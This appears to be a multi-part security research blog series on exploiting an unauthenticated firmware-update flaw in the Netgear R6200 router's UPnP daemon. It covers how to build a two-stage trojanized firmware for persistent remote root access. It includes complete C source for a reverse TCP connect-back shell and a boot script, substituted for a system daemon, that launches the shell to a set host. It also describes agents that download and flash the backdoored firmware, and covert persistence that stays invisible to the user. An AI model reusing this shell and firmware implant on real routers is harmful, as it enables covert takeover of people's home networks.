Thursday, November 05, 2015

In the previous post, we walked through building a stage 1 firmware image that can be flashed to the Netgear R6200 by exploiting the hidden SetFirmware SOAP action in upnpd. Due to an undersized memory allocation, we aren't able to flash a full sized image using this exploit. Whereas a stock firmware is nearly 9MB, the buffer upnpd base64 decodes into is 4MB, leading to a crash. As a result we have to load our trojanized firmware in two stages.

The first stage is stripped down to bare essentials and contains an agent that downloads and flashes a full sized second stage providing persistent remote access. In this part, we conclude the series with a discussion of how to prepare the stage 2 and what it should contain.

Updated Exploit Code

There have been substantial changes to the part 14 code. There is a new exploit script, firmware_exploit.py. This script wraps setfirmware.py from the previous installments, plus it sets up connect-back servers required by both stages of the payload. Unlike before, it requires no command-line arguments. Instead it takes its configuration parameters from environment.py, which is thoroughly documented. If you haven't already now is a good time to clone the repository. There's a lot going on in this final part, and perusing the source is the best way to see how it all works. You can clone the repo from:https://github.com/zcutlip/broken_abandoned

Post Exploitation

This and the previous posts focus on the post exploitation phase. This is among my favorite parts of vulnerability research and exploitation. It's the reward for all the head-desking that went into reverse engineering the vulnerable code and debugging your exploit. At this point, your exploit is working, giving you full control over your target. You can run any code you choose on the target as if it was your own. So how do you level that up into something useful? What you do with it depends on your goals and your imagination.

Besides the obvious remote root shell, you could use your compromised host as a platform from which to attack other hosts. Here's a video showing just that. In the video, I demo an exploit chaining framework. The script exploits buffer overflows in three devices. It tunnels through the first to exploit the second, and through the first two to exploit the third. Then the connect-back shell tunnels backwards from the third host, though the second and first. From the perspective of the third host, the exploit came from the second.

If you do go with the root shell, do you want it to be a simple TCP shell, or something more sophisticated, like SSH? You could even have the exploit download and execute an arbitrary payload from the internet for maximum flexibility. Should you have the payload run automatically at boot, or should it lie in wait, checking a dead drop for further instructions?

For this project I'll stick with a simple connect-back TCP shell. This style of payload connects from the target to wherever I choose. Since this requires only an outbound connection from the compromised host, it helps get around filtering of inbound connections.

Stage 2 Preparation

In the previous part I described embedding the mtd utility from OpenWRT in the first stage in order to write stage 2. The mtd utility is ideal because it's so simple and handles the semantics of unlocking, erasing, and writing flash memory. Due to its simplicity, however, mtd has no knowledge of the ambit firmware format, nor does it know to write the firmware footer at the end of the flash partition. The mtd utility simply writes an opaque blob to whatever /dev/mtd device you specify. Because it was late when I was finishing up this project, I didn't want to write and debug a custom utility to run on the target that could parse the ambit format. I wanted to keep as much of the complexity as possible in the pre-exploitation phase and out of post-exploitation. This reduces the likelihood of things going wrong on the target device, from which you can't easily recover. I decided to preprocess the firmware image using Python and generate a flat file that could be laid down on the appropriate flash partition. I've added a tool, called make_mtd.py, to the repo that does the conversion.

Here's an example of it in action, generating a binary image exactly the size of the target flash partition:

Of course you'll need to serve up the second stage somehow. Recall that we had a script in stage 1 run at boot time and use wget to download stage 2. We'll need to serve the flattened second stage over HTTP.

Up to now, we've been using Bowcaster primarily to build the firmware image. Its API for describing buffer overflow strings and ROP gadgets happens to be convenient for describing the ambit and TRX headers. However, Bowcaster also provides a number of server classes for exploit payloads to call back to. One of those classes is a special-purpose HTTP server. I found myself wanting an HTTP server to terminate after serving one or more specific payload files, allowing the exploit script to move on to the next stage. The class that does this is HTTPConnectbackServer. It's simple to use. You provide a list of files to serve (files may be listed multiple times if they are to be served multiple times), an address to bind to, and optionally a port and document root:

files_to_server=sys.argv[1].split(",")httpd=HTTPConnectbackServer(ip_address,files_to_serve)httpd.serve()# wait() blocks until server terminateshttpd.wait()# do rest of exploit...

Once the second stage has been served up, the exploit script moves on to the next phase. This allows the script to run synchronously with payload execution on the target.

Stage 2 Payload

This brings us to the next question: what should the second stage firmware include? As I explained above, the options are practically unlimited. For the sake of simplicity, we'll stick with a reverse TCP shell that we can configure to phone home. This provides a remote root prompt without our having to worry about interference from a firewall or NAT router between us and the target. Further, you could have a completely separate system receive the remote shell, even from outside the target's network. That other system would require no knowledge of the target's hostname or IP address.

Many readers will already be familiar with the reverse shell, but for those that aren't, here's a typical C implementation that we'll cross-compile and bundle into the firmware. It's fairly straightforward if you're accustomed to C programming on Linux.

#include <stdlib.h>#include <unistd.h>#include <stdio.h>#include <netdb.h>#include <string.h>#include <sys/types.h>#include <sys/socket.h>/* * Create reverse tcp connect-back shell. * ./reverse <IP address> <port> * IP address address of host to connect back to. * port port on host to connect back to. */intdo_rtcp(constchar*host,constchar*port){char*ex[4];ints;structaddrinfohints;structaddrinfo*res;intret;memset(&hints,0,sizeofhints);hints.ai_family=AF_INET;hints.ai_socktype=SOCK_STREAM;ret=getaddrinfo(host,port,&hints,&res);if(ret!=0){fprintf(stderr,"getaddrinfo: %s\n",gai_strerror(ret));return1;}s=socket(res->ai_family,res->ai_socktype,res->ai_protocol);if(s<0){perror("socket");return1;}ret=connect(s,res->ai_addr,res->ai_addrlen);if(ret<0){perror("connect");return1;}//replace stdin, stdout, and stderr with the socket since//all of our input and out put will go to and come from the //remote host.dup2(s,0);dup2(s,1);dup2(s,2);//Now exec /bin/sh, which replaces this process.//The new /bin/sh process will keep the the file descriptors we //dupped above.ex[0]="/bin/sh";ex[1]="sh";ex[2]=NULL;execve(ex[0],&ex[1],NULL);//we should never get to this point, so something went wrong.return1;}intmain(intargc,char**argv){constchar*host;constchar*port;pid_tchild;if(argc!=3){fprintf(stderr,"%s <IP address> <port>\n",argv[0]);exit(1);}printf("Forking.");child=fork();if(child){printf("Child pid: %d\n",child);exit(EXIT_SUCCESS);}else{printf("We have forked. Doing connect-back.\n");host=argv[1];port=argv[2];exit(do_rtcp(host,port));}}

How should we kick off the reverse shell? The simplest way is to phone home with your reverse shell immediately. While simple, this method is not without problems. Perhaps outbound internet connectivity isn't yet available, or you may not have a reverse shell listener available to receive the connection. As such, you may want to wait until a prearranged condition is satisfied. You could have your boot-time agent check a dead drop such an HTML comment on a website. Or it could perform a DNS query looking for a specific IP address.

For this project, we'll keep it simple, and just fire off the reverse shell automatically on boot. Recall from last time, we replaced the /sbin/wpsd executable with a shell script that was responsible for downloading and flashing the second stage. Unfortunately we can't use that trick again; we need to restore the original wpsd binary so the router will can function normally. There is, however, an executable that isn't likely to be missed if we replace it.

Almost every consumer Netgear device has a telnet backdoor listening on the LAN. There is a daemon, telnetenabled, that listens for a magic packet on the network which causes it to start up telnet. Since this service isn't essential for normal operation, we can replace it with our shell script. It also helps that telnetenabled runs late in the boot process, so hopefully network connectivity has been established.

#!/bin/sh#WAN or LAN host is fine here.host=10.12.34.56
port=8081
# We could put this in a loop if we wanted to phone home even# after the initial connection, or if network connectivity isn't# always available.
/usr/sbin/reverse-tcp $host$port

And with that we should have our remote root shell, assuming everything has gone right. This final part combines a lot of pieces, both on the target and on our end. I've covered most of it here, but if you want to see how it all fits together, check out the part 14 addition to the source code repository.

Summary:

So, to recap, here's a summary of the exploitation process from start to finish:

Send a string to upnpd, probably in the form of HTTP headers but not necessarily, containing SetFirmware.

Ensure Content-Length: header with a value greater than 102401 is in the initial string.

Be sure the firmware image is less than 4MB; it gets base64 decoded into an undersized buffer.

upnpd triggers a reboot into the stripped-down firmware.

A script downloads a flattened, full-size firmware image and writes it to flash memory.

The router reboots a second time.

A script (put in place of Netgear's telnet backdoor) kicks off a reverse-TCP shell session to a predetermined destination, yielding remote root access.

One More Thing

While the reverse-TCP agent gives us complete, remote control over the device, its operation is essentially invisible to the user. In fact, there's almost no way to tell by inspection that we've taken over the device. For the purposes of real-world exploitation, this is ideal. The router continues to function as normal with no indication otherwise. For demonstration purposes, however, wouldn't it be cool if we could leave a calling card, so to speak? This could be some sort of easily identifiable sign that there are no tricks up our sleeve--that we really have owned the target.

In the router's web interface, there is a "Netgear Genie" logo in the upper lefthand corner. This logo comes from /www/img/Netgeargenie.png on the router's filesystem. When we're building the second stage firmware image, we can replace that image with one of our choosing (giving it the same name of course). After the last reboot, when we log into the router's web interface, there can be no doubt who's in charge.

This device has been truly and completely pwned.

There are a lot of moving parts, and we've covered a lot of ground in 14 installments. I'll leave you with the video I included in the prologue that shows it all come together. Come for the 'sploits, stay for the music.

Thursday, October 08, 2015

In the first twelve parts of this series, we identified an unauthenticated firmware update feature in the Netgear R6200 wireless router. Unfortunately, this feature was broken and only partially implemented, making exploitation less that straightforward. We reverse engineered the timing requirements and structure of the SOAP request required to exploit this vulnerability. We also reverse engineered the firmware image format, including its undocumented firmware header.

As of the previous part, the exploitation phase is complete, which is to say we are able to have the Netgear UPnP daemon overwrite the firmware on flash storage with arbitrary data of our choosing. We are able to do this without authentication.

This and the next part will cover post exploitation. We're able to write a firmware with whatever customization we desire. How should we trojanize the firmware image so that the exploit yields persistent remote access?

Updated Exploit Code

This week's update to the proof-of-concept code is substantial. There is a new part_13 directory that corresponds to this post. The SetFirmware exploit and firmware generation code remains the same. However, there is a new payload-src directory which contains code for generating a stage 1 (and later, stage 2) payload. The README in part_13 has been updated with details on assembling the stage 1 firmware. Now is a good time to do a git pull. If you don't have the code, you can clone it from:https://github.com/zcutlip/broken_abandoned.git

Recap

Before discussing post-exploitation firmware, it's worth recapping how the exploit works. It goes roughly like this:

Send HTTP headers for a SOAP request, including a magic Content-Length value

Sleep one second

Send remainder of the SOAP request with trojan firmware base64 encoded within

Sleep 1-2 seconds

The firmware must be stripped down to less than 4MB to avoid crashing upnpd

If the firmware header passes minimal inspection and avoids crashing upnpd, it is written to flash, replacing the original firmware

The target reboots into the new firmware

Unfortunately, due to the bug that crashes upnpd, the firmware image must be stripped down to a size such that it's barely functional. In part 11 we stripped out everything except what is required for the device to successfully boot and have internet connectivity. This even included the web server. This has a couple of implications. First is this exploit requires a two-stage payload, since we can't leave the device with a stripped down firmware. The first stage must download the second stage, a full-blown, trojanized firmware image, and flash it. The device must then reboot into stage 2.

The second implication is that there is nothing remaining in the stripped down firmware with which to parse and flash the second stage firmware image. We'll need to come up with a mechanism to do the downloading and flashing of stage 2 and integrate it into the minimized stage 1 image. Of course, in order to stay under 4MB, this mechanism must be as small as possible.

How to Bootstrap Stage 2?

This can be broken down into two problems:

How to kick off this process automatically at boot time?

How to parse and flash the firmware image?

The first part is relatively easy. As I mentioned in part 11, the boot sequence is brittle and not at all configurable. There's a binary executable that kicks off the various services in a particular order. Some of those services kick off other services. There is no editable script or configuration file that determines what should run and in what sequence. It's unclear what the impact will be if a service fails to start. If you recall, to trick the system into thinking every service had started successfully, we replaced each service with a shell script of the same name that exits with a successful status. It is simple to edit one of those dummy scripts to download and flash the stage 2 image. I recommend choosing one of the last scripts in the boot sequence to ensure networking has been configured. I chose the /usr/sbin/wpsd script; it runs late in the boot sequence. Luckily, we still have wget on the system (it's one of busybox's personalities), so downloading the second stage is simple.

For the second problem, flashing the downloaded image, we'll need to provide a utility, since there's nothing left that will do this for us. Because it was late at night when I was working on this part, I didn't want to spend time writing my own utility to parse the ambit image, and to do gymnastics involved writing the image. Fortunately, the OpenWRT project provides an mtd-writing utility that handles all the semantics of unlocking, erasing, and writing /dev/mtd flash memory devices.

I had to patch the utility to remove functionality we don't need, thereby eliminating some library dependencies. Since OpenWRT is GPL licensed, I didn't want to include it in this project's source code. The README in part 13 of the PoC code describes how to clone my mtdwriter project and put it in the right place so the stage 1 Makefile will find and build it. For the curious, the customized mtd utility is located here:https://github.com/zcutlip/mtdwriter

You will, of course, need a uClibc little endian MIPS cross compiler to build it. I recommend using buildroot to build the cross compiler.

OpenWRT's mtd doesn't know anything about the ambit firmware image. It's only useful insofar as it can write arbitrary data to a /dev/mtd device. This actually works out for the best; bootstrapping the second stage is a sensitive operation. If anything goes wrong, the target device will be bricked. Moving as much complexity as possible off the target and into the payload building stage is good.

Since we already have code that generates an ambit firmware image, the easiest thing to do is to preprocess that file and turn it into a flat image that can be laid down on the appropriate flash partition. The mtd utility just writes an opaque blob with no knowledge of what it's writing.

Below is the "fake" wpsd script that downloads the second stage and flashes it using the mtd utility.

When we roll those changes into the minimized stage 1 firmware, then exploit the UPnP server, the device should reboot, then download and flash the second stage firmware image. You'll need to serve the stage 2 image over HTTP so wget can download it. We'll cover that in part 14.

Also in the next and final part, we'll discuss preprocessing an ambit image for easy writing to flash. We'll also address what the second stage firmware should contain such that it yields persistent, remote access.

Thursday, September 17, 2015

In the previous part, I described how to strip out all but the most essential services and libraries in the stock firmware in order to get the firmware image down to under 4MB. This avoids crashing upnpd, which allocates less than half enough memory to base64 decode a stock-sized firmware image.

In this part, we'll walk through a crasher you might encounter (or might not, depending how you formatted your ambit header) and how to sidestep it.

Updated Exploit Code

I last updated the exploit code for part 11, when we added a missing checksum to the ambit header that prevents the router from booting if missing. In this part I've updated the code to add an additional field to the ambit header that, in some cases, will prevent a post-exploitation crash in upnpd. If you've previously cloned the repository, now would be a good time to do a pull. You can clone the git repo from:

An Invalid free() Crashes the Party

Remember how this firmware updating "feature" in upnpd is buggy and only partially implemented? Well right at the very end, after upnpd writes the size/checksum footer to the flash partition, the decoded firmware buffer gets passed to free(). All good, right? Except not really, because it isn't exactly the decoded firmware buffer. It's the buffer plus ambit header size. Oh shit!

Oh noes! Death can occur!

Here's what's happening.

Oh snap! We free()ed the wrong thing.

This is super shitty. If upnpd crashes before it can reboot the target, we're sunk; we've lost control of the device at that point.

In some cases this won't crash the program, though who knows in what state the process's heap will be. Other times this definitely results in a crash. In order to know why, it helps to understand a little about how libc dynamically allocates memory.

Spelunking in free() and malloc()

uClibc, the C library the Netgear R6200 uses, has three different malloc/free implementations: malloc, malloc-standard, and malloc-simple. Which one gets used is determined at compile time. Which implementation our device uses can be verified by first finding a symbol that is only referenced by a single malloc implementation.

Presence of the __malloc_state symbol indicates the target's libc is built with the malloc-standard implementation. We can now focus source code analysis in the right place. Let's have a look at uClibc source, specifically /libc/stdlib/malloc-standard/malloc.h.

See, when you call malloc(), the pointer you get back (and later pass to free()) doesn't actually mark the beginning of the chunk of memory allocated. There is metadata prepended to your buffer. Although malloc implementations vary, what you see above is fairly typical. There is a size of the current allocated chunk, as well as the size of the previous chunk, if there is one.

If you pass an arbitrary address to free(), there's no telling what's going to happen. This is undefined behavior and what happens next depends on the malloc implementation, the state of the heap, and the chunk metadata. Maybe nothing will happen. Or there could be heap corruption, which may or may not be exploitable. Alternatively, the program could crash in free() if an invalid dereference occurs.

As I was reverse engineering the R6200's firmware header, upnpd crashed predictably under certain conditions. When the chunk metadata is used to compute a pointer to the next chunk, the result was an invalid address. Then the dereference of the nextchunk pointer caused a crash.

Location of the crash in free() due to freeing an invalid pointer.

A way of avoiding the crash is to insert fake chunk metadata in the firmware header[1]. It is the address of the TRX image in memory that upnpd attempts to free. Unfortunately the only way to cause free() to bail immediately is to pass it a NULL pointer. However, if it thinks the allocated memory chunk is zero bytes, it takes a much shorter path and avoids the crash. So, right at the end of the firmware header and before the TRX image, you may insert a 4-byte "chunk metadata" field equal to zero.

Referring back to the header/image diagram from above, the firmware layout now looks like:

This still may result in some heap corruption, but the firmware has already been written, and upnpd is moments away from rebooting the device. We only need to avoid crashing long enough for the reboot.

In the next two parts, we finish up with a discussion of post-exploitation. As of this part we have successfully exploited the SetFirmware SOAP action, causing upnpd to overwrite the firmware with arbitrary data of our choosing. The next steps will be to make that data useful for persisting remote access to the target. Stay tuned!

------------------------------
[1] Credit to former colleague @dongrote for suggesting playing games with malloc metadata might help avoid crashing in free().

Thursday, July 16, 2015

In the previous part, we moved away from emulation to working with physical hardware. We identified a UART header inside the Netgear R6200 that can be used for console access. I demonstrated how to access the CFE bootloader's recovery mode to reflash a working firmware over TFTP. This makes it possible to iteratively modify and test firmware images that will be used in the SetFirmware UPnP exploit.

In this part, I'll talk about regenerating the filesystem portion of the firmware image. I'll also walk through shrinking the filesystem in order to avoid crashing upnpd.

Updated Exploit Code

I last updated the exploit code for part 9, when we filled out the "janky" ambit header enough to satisfy upnpd. In this part I've updated the code to add an additional header field that must be filled in order to boot. If you've previously cloned the repository, now would be a good time to do a pull. You can clone the git repo from:

Regenerating the Filesystem

Recall from before that the firmware image for the R6200 consists of four parts:

Proprietary "Ambit" header

TRX header, which is well documented

Compressed Linux kernel

Squashfs filesystem

We reverse engineered the ambit header by analyzing the httpd and upnpd binaries. The TRX header is well documented and did not need to be reversed. We can reuse the Linux kernel from an existing firmware; no changes to it are required. All that remains is regenerating the SquashFS filesystem.

Generating a SquashFS filesystem is relatively straightforward; there are existing tools to turn a root filesystem directory into a filesystem image. The problem lies in the many different variations of SquashFS. In addition to the various official versions, vendors tweak it further for their own motivations. As a result of this proliferation of SquashFS variations, it can be hard to know which SquashFS tool will work with a given device. For this project, we're in luck. Netgear makes available open source GPL archives for most of its consumer products, including the R6200.

You'll find the source code, as well as a precompiled mksquashfs binary. Oddly, there are even intermediate objects from compilation. I always get the feeling that GPL releases from router vendors are just someone's workspace that got tarred up and posted online. Anyway, the mksquashfs binary is the one that I used. It's 32-bit, so I had to install lib32stdc++6 in my 64-bit Ubuntu VM. In theory, you should be able to rebuild the tools from source as well, but I didn't try. I put the executable in my path (~/bin in my case) so I can easily call it from scripts. I also gave it a unique name to differentiate from other SquashFS utilities.

In order to regenerate a filesystem image, you run mksquashfs on the root directory and give it the -noappend and -all-root options:

The first argument is the name of the root directory to convert to an image. The "rootfs.bin" is the name of the image to generate. The "-noappend" option means to not append to an existing image, and the "-all-root" option means to set ownership of all files to root.

Shrinking the Filesystem.

When we generate the root filesystem, it comes out to be over 7MB. There are additional options to mksquashfs that affect compression and block size and can impact the resulting image size. I wasn't able to get the resulting image to come out any smaller regardless of what options I used. In some cases, it ended up larger.

We can't change the size of the headers or of the kernel. So that leaves us with only the filesystem. If the total firmware size is to come in under 4MB, we need to get the filesystem down to around 2,700 KB or less. That's down from 7,400 KB. Obviously, there's no way to get a full firmware to fit in this size, or even one that approximates a full firmware.

So what can we do with such a small firmware? Is there even a point in this exercise? My strategy was to strip down the firmware as much as possible to come in under the limit, but still have the router do the following:

boot successfully

have a functioning userspace, including shell

have network connectivity, including to the internet

This first stage firmware should have some sort of agent that phones home to a predetermined server to download a second stage image. It should flash that image, and reboot. The second stage firmware will be a full blown firmware that looks identical to the stock firmware, but contains whatever additional tools and remote access capability we want.

Our goal is to figure out what we can strip out of this firmware while leaving it with a minimum level of functionality to bootstrap the second stage. The uncompressed filesystem takes up 28MB.

$ du -hs rootfs28M rootfs

There are a number of executables that are tempting to remove, as they seem noncritical. Before doing so, be sure they aren't links to /bin/busybox. Removing a link won't save significant space. The only way to save space with these executables is to rebuild busybox with fewer personalities.

The first thing that can go is the HTTP server and its resources. The www directory takes 4.6 MB on disk, and httpd takes 1.6 MB.

Removing a system service can be risky. On embedded devices such as this one, the boot sequence can be pretty brittle. Unlike a general purpose Ubuntu or Red Hat server, these are designed with the assumption that no components will be added or removed. If a service is removed that is critical to the boot process, the device may be rendered unusable. To reduce this risk, I replaced any removed system executables with a shell script of the same name that terminates with a successful exit status. This should trick whatever init or rc program is kicking off boot processes into thinking the service started successfully, thereby allowing the boot sequence to proceed uninterrupted.

Here's a script that replaces a given system binary with a dummy script:

As I removed each service, I generated a new, complete firmware image and installed it through the R6200's web interface to be sure the device would still boot and had network connectivity. Of course even it it does boot and run, you've now removed the web interface. This means there's no facility to reinstall the factory firmware. You'll need to recover via the serial interface I described in part 10. Using the serial console, you can recover using the bootloader's TFTP server.

For each service you remove, there may be shared libraries that are no longer needed. Those can be removed as well. An easy trick is to grep all the remaining executables for a given library's name. Here's a script you can paste into the terminal as a one-liner that will use grep to discover what executables link what shared libraries.

The libvolume_id.so shared library evidently isn't linked by anything and can be removed. The libvorbis.so shared library is linked by the DLNA service and may be removed once that service is removed. Re-run the script to generate a new list of library references each time you remove a service. This was a lengthy, iterative process for me. You may remove a critical service by accident or you may remove a library that is critical but not linked directly. It's important to test that each change results in a firmware which will still boot.

After we remove httpd and the www directory, the new root file system is just over 7000KB. That leaves 4300 KB to go. Keep repeating this process of removing services from /usr/sbin and /sbin, and corresponding libraries that have no references. Make your changes a few at a time so you know what to put back if the device is no longer functional after rebooting.

With all of these libraries and executables removed, the root filesystem directory was down to 9.8MB from 28 MB. The compressed SquashFS filesystem was down to 2,228KB! That's from a starting point 7.2MB. After building the complete ambit image (with ambit header, TRX header, kernel, and filesystem), it came to 4121918 bytes, or 0x3EE53E in hex. Recall the undersized malloc() for Base64 decoding was 0x400000. That's 70KB to spare! Kick ass[1].

Checksum Mismatch!

Now we can try uploading our minimized firmware to the R6200 using the UPnP SetFirmware exploit code[2]. At this point, you definitely need to connect to the UART serial interface if you haven't already. Even if the firmware boots, we've stripped out all the essential services, so there's no other way to see what's happening or what state the device is in after boot. And if it doesn't boot, well, you'll be glad you have the serial connection and CFE's recovery mode.

When I built a firmware and pushed it to the device over UPnP, exploiting the SetFirmware vulnerability, I was able to see the updating progress over the serial console. And then the R6200 rebooted. So close! After the reboot, I saw CFE initializing. And then this.

The CFE bootloader detects a firmware checksum mismatch.

On boot we see:

Image chksum: 0x61354161
Calc chksum: 0x9F3FAE72

Then the boot sequence halts, and CFE helpfully starts up a TFTP server for us.

The image checksum, 0x61354161, looks familiar. Let's go back to the firmware generating script and find_offset().

Oh look. That's the 4-byte value at offset 16. We discovered what field is when for when reversing httpd. From part 7:

We're not done with checksums just yet. The basic block at 0x0043643C is another checksum operation. Once again the data points to "HDR0", but the size is only the value from offset 28. The size from offset 24 is not used this time. The checksum result is the same as before, but this time compared to the value at offset 16. We now know the checksum we compute and store at offset 32, must also be stored at offset 16. Presumably, this would be to calculate a separate checksum without including the mysterious extra section I speculated about above.

So, even though this field is never validated in upnpd (which is why we didn't find it the second time around), it does get checked by CFE at boot. In fact if we had gone a little farther with static analysis, there is a section where sa_parcRcvCmd() seeks to the end of the flash partition, unlocks and erases the last erase-size (65536) bytes, seeks to 8 bytes the end, then writes the values from field 24, the TRX image size, and from field 16, the TRX image checksum.

Writing the TRX image size and checksum to the end of the flash partition.

This problem is easily solved. We already have the TRX image size at offset 24. That's the size that got checked against a limit of 4MB. It's also the size that is used to determine how much data to write to flash. We just need to add the TRX checksum at offset 16:

SC.gadget_section(self.TRX_IMG_CHECKSUM_OFF_1,self.trx_image_checksum,description="Checksum of TRX image. This gets verified by CFE on boot.")

With that done (and the router recovered back to a stock firmware), we can try again. And when we do, success! The router boots up completely to an interactive console.

Let's take a break for a second and reflect on where we are. We've successfully exploited a broken, abandoned, and forgotten capability in order to upload a firmware that we control to the Netgear R6200 over the network without authentication. We had to overcome the following challenges to get here:

Reverse engineer the UPnP daemon

Come up with silly timing games necessary to work around the broken networking code.

Binary patch, emulate, and debug upnpd and httpd.

Work out what the SOAP request should look like since the “parsing” is just bunch of strstr()’s against the *entire* HTTP request, and spread across a whole bunch of different functions

Reverse engineer the legitimate firmware format, as parsed by httpd.

Reverse engineer how upnpd parses the firmware format.

A few things remain before we can declare victory. We need to:

Embed a tool in the minimized stage 1 firmware image that will download the larger stage 2 firmware.

Successfully write the downloaded firmware to flash so that CFE is satisfied and will boot it.

Embed some sort of backdoor in the larger firmware. After all, that's the point of the exercise, right?

Before wrapping up the series, I'll discuss all three of these things. Before that, though, I'll discuss an intermittent crasher due to an invalid free() that you may or may not have encountered. Avoiding it is necessary to ensure the router reboots into the stage 1 firmware. I'll talk about how we can abuse the firmware header in such a way as to prevent crashing.

------------------------------
[1] When I did this project the first time around, back in December 2013 and January 2014, I hadn't discovered samba hiding out in /usr/local/samba. After deleting all the nonessential stuff from /usr/sbin and /lib, the SquashFS filesystem was still about a MB over the 2.7MB we need. What I ultimately did back then was to delete the (huge!) 4.1MB wl.ko from /lib/modules/2.6.22/kernel/drivers/net/wl. This, unfortunately, is the kernel module for the wireless hardware. Deleting this meant when the system booted there would be no WiFi. The system still worked and had network connectivity, but this was a very intrusive modification that I was never really happy with. Fortunately, finding the Samba installation in a non-standard directory means we don't need to remove the wireless driver.

[2] This is in the git repository linked earlier. The exploit script is setfirmware.py.

Thursday, July 09, 2015

Debugging and De-bricking the Netgear R6200 via UART

Update: I forgot to credit my former colleague, Tim (@bjt2n3904), for helping me locate the UART header. This project would have been way more challenging without the serial connection. It would have involved desoldering the flash memory chip, probably replacing it with a ZIF socket, and then removing and reprogramming the chip for each iteration of testing.

In the previous installment, we filled out the ambit firmware header just enough to satisfy Netgear's broken UPnP server. We also patched out several ioctl() calls in upnpd in order to test the SetFirmware exploit in emulation.

We're now at the point that emulation is no longer adequate; we need to start testing against actual hardware. There are subtle and not-so-subtle differences between emulation and hardware that affect how the exploit works. Some exploits, such as command injections and even buffer overflows, can be tested and developed entirely in emulation. Since this exploit writes a firmware image to flash memory, we need to ensure it is written to physical storage properly and will successfully boot and run.

Experimentation with modifying a device's firmware calls for some sort of connectivity at a lower level than just a Linux shell. If the operating system fails to boot, there is no shell. We'll need to connect to the device in order to diagnose the problem and recover. The iterative process of developing the small, bootstrap firmware that I will describe later entails many incomplete builds that will leave the device in a semi-broken state. Knowing that you can recover by restoring a good firmware makes the project much less risky.

3 male-to-female jumper wires of different colors (black, orange, and yellow are ideal)

Hunting for UART Header

Fortunately the R6200 has a UART header you can connect to using a serial terminal application such as Minicom. With Minicom, you can interact with the bootloader to see diagnostic messages and even drop into a recovery console.

To interface with the R6200's UART, you can use a cable like the FTDI 3.3V USB to Serial cable, (part number TTL-232R-3V3-2MM). It's available from Allied Electronics, Amazon, SparkFun, and others.

USB to UART cable for serial debugging

The UART connection isn't exactly set up and ready for you to use, though. This means taking apart your router and heating up your soldering iron.

There are couple of torx screws that hold the base on.

Then there are a couple more torx screws that hold the outer shell together. These are the same size as the previous ones, but different length. Keep them organized if you plan to put the router back together.

More screws.

With the outer screws removed, you can start separating the front and back half of the clamshell. There are plastic tabs all the way around that hold it together. I broke a few trying to get it open. Once you get the front half off, you'll find the PCB held in by more torx screws.

Once you remove the PCB, you can locate the UART header, which is exposed as four solder pads.

The solder pads, from left to right, are VCC, ground, transmit, and receive. You don't need VCC; it's +3.3V power. The USB adapter is powered by your computer's USB port, instead. That leaves ground, TX, and RX. The transmit and receive are relative to the device, so transmit from the device connects to receive of your cable and vice versa. Solder short leads to the appropriate pads, and connect your jumper wires to them. Then, route the jumpers out of the case so you can access the UART once you reassemble your router. I drilled a small hole in the top for a passthrough.

Here's how the UART header maps to the USB adapter's pinout:

Device GND <-> Adapter GND (black)

Device TX <-> Adapter RX (yellow)

Device RX <-> Adapter TX (orange)

If you have orange, yellow, and black jumpers, connecting them up so the colors match the USB adapter will save you some trouble. Sadly, I had green, pink, and blue on hand, so mine is exciting and confusing every time I hook it up.

Then, I zip-tied the leads to reduce stress on them.

Connecting Using Minicom

You may want to test the serial connection before reassembling. The baud rate is 115,200 and serial port settings should be 8,N,1. Here's my mincom configuration for the R6200. Obviously adjust your ttyUSB device as appropriate, but it's usually /dev/ttyUSB0.

When you connect with Minicom and power on the R6200, you can see the boot text scrolling across the console. If you let it boot, and hit return in the console, it gives you a root prompt. It's not a great terminal environment, though. There's no scrollback, for example. Once you have a serial console, use netgear-telnetenable[1] to fire up the telnet backdoor.

Shitty terminal environments aside, the serial console is great for restoring to a non-broken firmware. As long as nothing trashed the flash partition that contains the CFE boot loader, you can break in to a debug prompt and do a restore.

When you first power on the device and see CFE loading, break in with ctrl+c. You need to break in right after CFE starts, but before it finishes loading the kernel and operating system from flash. Incidentally, this gets trickier after we shrink the firmware down from nearly 9MB to under 4MB because the load time shortens dramatically, narrowing the window when you can break in.

Recovering a Bricked Router

If you break in at just the right time (I just mash ctrl+c repeatedly), you should get a CFE> prompt. Once you've got the prompt you can start up CFE's TFTP server with the tftpd command to restore a factory firmware.

The router's network configuration is 192.168.1.1/24. There's no DHCP server in this mode, so you'll need to configure your own network interface manually. You'll need a tftp client to upload the firmware image. TIP: Be sure to switch your client to binary mode. This gets me every time.

When you reboot, the router should be back to normal. Now you can iteratively test custom firmware knowing that it only takes a minute or two to restore back to a good one.

In the next part, we'll regenerate the SquashFS filesystem. We'll also work on shrinking the firmware down to 4MB to avoid crashing upnpd during exploitation. We'll need to hunt down and eliminate nonessential services, while avoiding breaking the boot sequence. Stay tuned!

------------------------------
[1] Did you know that nearly every one of Netgear's consumer devices has a well-known but unacknowledged backdoor? It's true. What the fuck are we even doing here. Who needs trojaned firmware when Netgear devices already have a backdoor. http://wiki.openwrt.org/toh/netgear/telnet.console

Thursday, June 25, 2015

In the previous part, we switched gears back to the Netgear R6200 upnpd after spending some time analyzing httpd. The HTTP daemon provided an understanding of how the firmware header is supposed to be constructed. We found a header parsing function in upnpd that was similar to its httpd counterpart. So similar that it has the same memcpy() buffer overflow. This overflow was more interesting this time around, as it did not require authentication. Additionally, we discovered a reference to the "Ambit image" via an error message string. Presumably an ambit image is a firmware format analogous to TRX. In this case, however, the ambit image encapsulates a TRX image.

In this part we will identify more fields of the Ambit header, as well as run up against a limitation of QEMU: attempts to open and write to the flash memory device will fail since, in emulation, there is no actual flash memory. We'll need to patch the upnpd binary in order to work around this. I previously covered binary patching for emulation here.

Updated Exploit Code

The janky_ambit_header.py module has been updated to reflect the additional fields we add to the header in this part. You can find the updated code and README in the part_9 directory. Now is a good time to do a pull or to clone the repository from:

We Should Have Checked the Firmware Size Before Now

The sa_CheckBoardID() function, analogous to abCheckBoardID() from httpd, returns success if the following is true:

The ambit magic number is found at offset 0.

The header size field doesn't overflow during the memcpy() operation

The checksum in the ambit header matches the header's actual checksum,

The proper board ID string is found and the end of the ambit header.

After sa_CheckBoardID(), at 0x00423CAC, we see several 32-bit fields parsed out. It remains to be seen how these values get used; presumably they are the same fields and get used the same way as in the httpd firmware validation. Then the size field from offset 24 is checked. It must be less than 0x400001, or 4194305, or firmware validation fails.

Somewhat ironically, this check can never fail, assuming the size field is truthful. If the firmware image is larger than this size, then upnpd will crash, having overflowed the 4MB buffer allocated for base64 decoding. In our proof-of-concept code, the size field contains a bogus value, and execution skips down to an error message.

